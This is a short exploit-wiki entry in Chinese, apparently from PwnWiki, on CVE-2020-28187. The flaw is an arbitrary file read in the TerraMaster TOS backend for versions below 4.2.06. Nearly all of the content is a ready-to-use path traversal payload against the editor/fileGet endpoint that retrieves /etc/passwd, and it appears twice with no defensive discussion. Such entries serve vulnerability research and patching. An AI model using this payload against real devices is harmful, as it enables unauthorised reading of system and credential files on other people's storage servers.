CVE-2020-28187 TerraMaster TOS 後台任意文件讀取漏洞
From PwnWiki
漏洞影響
TerraMaster TOS < 4.2.06
Payload
/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
TerraMaster TOS < 4.2.06
/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd